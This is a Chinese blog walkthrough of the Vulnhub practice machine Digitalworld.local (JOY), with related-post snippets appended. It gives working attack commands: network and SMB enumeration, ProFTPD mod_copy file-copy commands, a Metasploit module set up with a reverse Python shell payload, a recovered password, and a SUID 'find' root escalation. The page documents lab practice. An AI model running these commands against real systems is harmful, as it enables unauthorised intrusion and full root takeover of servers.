Vulnhub:Digitalworld.local (JOY)靶机

已于 2023-06-07 23:31:08 修改
阅读量456 收藏 1
点赞数
文章标签: 安全 网络安全 web安全
于 2023-04-14 17:46:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/130158931
版权

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

使用enum4linux枚举目标smb服务,发现两个系统用户

enum4linux -a 192.168.111.130

ftp可以匿名登陆,目录权限属主和树组都是ftp用户,猜测:访问的是ftp用户的家目录

upload目录中的directory文件内容,图中文件和目录权限version_control可能会有有用 的信息

漏洞利用

搜索proftpd漏洞

searchsploit proftpd

复制version_control文件到/home/ftp/upload目录

site cpfr /home/patrick/version_control
site cpto /home/ftp/upload/version_control

version_control文件内容

msf模块exploit/unix/ftp/proftpd_modcopy_exec拿shell

use exploit/unix/ftp/proftpd_modcopy_exec
set rhosts 192.168.111.130
set sitepath /var/www/tryingharderisjoy
set payload cmd/unix/reverse_python
run

提权

在/var/www/tryingharderisjoy/ossec/patricksecretsofjoy文件中发现用户patrick的密码:apollo098765

patrick用户sudo权限

执行/home/patrick/script/test该文件可以以root身份赋权限,给find命令suid权限,提升为root

find . -exec /bin/bash -p \; -quit

ctostm
关注
vulnhub -digitalworld.local: JOY (考点:ftp&ProFTPD漏洞/ linux提权知识)
冬萍子癸水
04-24 1256
https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap 很多端口,25和110想到smtp枚举邮件用户,和邮件查看。22想到ssh登录139 445想到smb查看敏感文件,21想到ftp查看敏感文件。 PORT STATE SERVICE VER...
Vulnhub靶机 Digitalworld.local (JOY)
菜浪马废的博客
05-03 852
ftp可以任何人登录 查看一下 查看version_control文件 看见:proftpd 1.3.5
joy靶机靶场渗透
qq_20032803的博客
02-14 725
1.扫描主机 nmap扫描主机 Nmap scan report for 192.168.100.132 Host is up (0.00034s latency). Not shown: 988 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 80/tcp open http 110/tcp open pop3 139/tcp open netbios-ssn 143
digitalworld.local: JOY靶机-Walkthrough
ins1ght的博客
10-02 664
通过FTP匿名账户获取directory,对其中的信息筛选后,确定version_control为线索。site cpto将version_control拷贝到FTP的upload文件夹,最终发现ProFTPD存在命令执行漏洞,成功getshell。之后发现了patrick用户的密码,切换用户后,发现了sudo权限的test。由于patrick没有test的写权限,于是先创建一个test,内容为/bin/sh,后用put test上传到upload文件夹中,最后使用site cpto覆盖原有test,提权。
Vulnhub Joy靶场 Walkthrough
RichardLuo
04-13 214
Vulnhub Joy Walkthrough
Vulnhub:Digitalworld.local (Development)靶机
qq_43884092的博客
04-09 581
访问development目录,提示存在一个流量包,查看流量包发现另一个网站路径:/developmentsecretpage/directortestpagev1.php,访问该路径后退出登录,再重新登录,用户名和密码随便填写,之后页面提示报错,根据报错搜索关键字
靶场:digitalworld.local: VENGEANCE
03-30
没有截图,但是有用的东西,全部都写上了 。一步一步来就能得到root。每一步都有描述,都有讲解。其中没有的部分,就没有卸载wp中,也不用操作,少走弯路。
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub: InfoSec Prep:OSCP靶机
qq_43884092的博客
05-07 754
secret.txt获得ssh私钥,suid提权
Digitalworld.local: JOY Vulnhub靶场题解
qq_42133828的博客
08-16 963
前期准备 镜像下载 https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ 环境配置: 在VM以net连接打开虚拟机 使用的机器: 攻击机:kali linux,ubuntu 靶机:ip随配(192.168.119.137) 渗透开始 1.nmap发现主机,并扫描其ip信息 nmap -A 192.168.119.137 2.发现ftp相...
靶机渗透练习57-digitalworld.localJOY
hirak0的博客
04-19 4189
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ Description Does penetration testing spark joy? If it does, this machine is for you. This machine is full of services, full of fun, but how many ways are there to align the stars? Perhaps
DIGITALWORLD.LOCAL-BRAVERY靶场
qq_20032803的博客
02-04 683
1.发现主机/扫描 root@kali:~# nmap -sn 192.168.100.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-03 10:26 EST Nmap scan report for 192.168.100.1 Host is up (0.00051s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.100.2 Ho
digitalworld.local: JOY(ftp将可读文件夹上传到可写文件夹)
墨痕诉清风的博客
04-29 1077
所以,当我们运行测试脚本时,它没有提供任何有用的东西,因为它是一个测试工作bash脚本的演示,因此文件“test”是无用的,但它由root用户拥有,这对我们来说是可疑的。因此,我们创建了一个恶意文件,在给定命令的帮助下获取bash shell,并命名为“test”,然后尝试将其上传到/upload目录中,因为它是一个可写文件夹。因此,我们再次决定使用FTP匿名登录来替换真正的/test文件与伪造的/test文件,这将是一个后门,以提供更高的特权外壳。txt文件和机密文件。
vulnhub(14):Digitalworld.local JOY(ftp 的未授权文件读写漏洞、文件覆盖提权)
anddddoooo的博客
09-24 1146
1.3.5版本有个file copy的漏洞:看了poc得知,这了漏洞是未授权的敏感文件读写,那么影响力一定很大。交互的地方也比较少,看看url参数f是否有本地文件包含,最终结果当然没有,一般这种系统也不会出现这么低级错误。21端口ProFTPD 是1.2.10版本,我们着重挑选1.2.10的版本后的漏洞,我注意到了。21,80,22尝试枚举足够多的敏感信息加渗透,然后再查看这三个端口是否有服务漏洞。这么多端口:995,993,465,143,587,110,25都是邮箱服务。
[Vulnhub] digitalworld.local-JOY snmp+ProFTPD权限提升
07-16 330
#snmp #ProFTPD权限提升
200kw直流电子负载测试的安全保障
SHANGHAIWENSHUN的博客
10-15 437
只有这样,才能有效地提高测试的效率和质量,保证电力电子设备的安全和可靠运行。
CTFHUB技能树之HTTP协议——响应包源代码
weixin_73049307的博客
10-13 711
点击“开始”没有抓取到报文,先看看网页源代码是什么情况。居然直接给出flag了,不知道这题的意义何在。是个贪吃蛇小游戏,看不出来有什么特别的地方。
等保测评:如何进行有效的安全合规性审查
2301_79955948的博客
10-18 621
等保测评(信息安全等级保护测评)是一项至关重要的安全合规性审查工作,旨在帮助组织保障信息系统的安全性、合规性,有效应对安全风险,提升整体安全防护水平。
面对AI算力需求激增,如何守护数据中心机房安全?
最新发布
HKT香港电讯的博客
10-18 536
面对AI时代算力需求飙升所带来的更高安全要求和挑战,数据中心机房需要具备更完善的容灾能力及应急预案。同时应从多个方面入手,全面提升安全防护能力,从而有效应对安全隐患及突发事故。
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值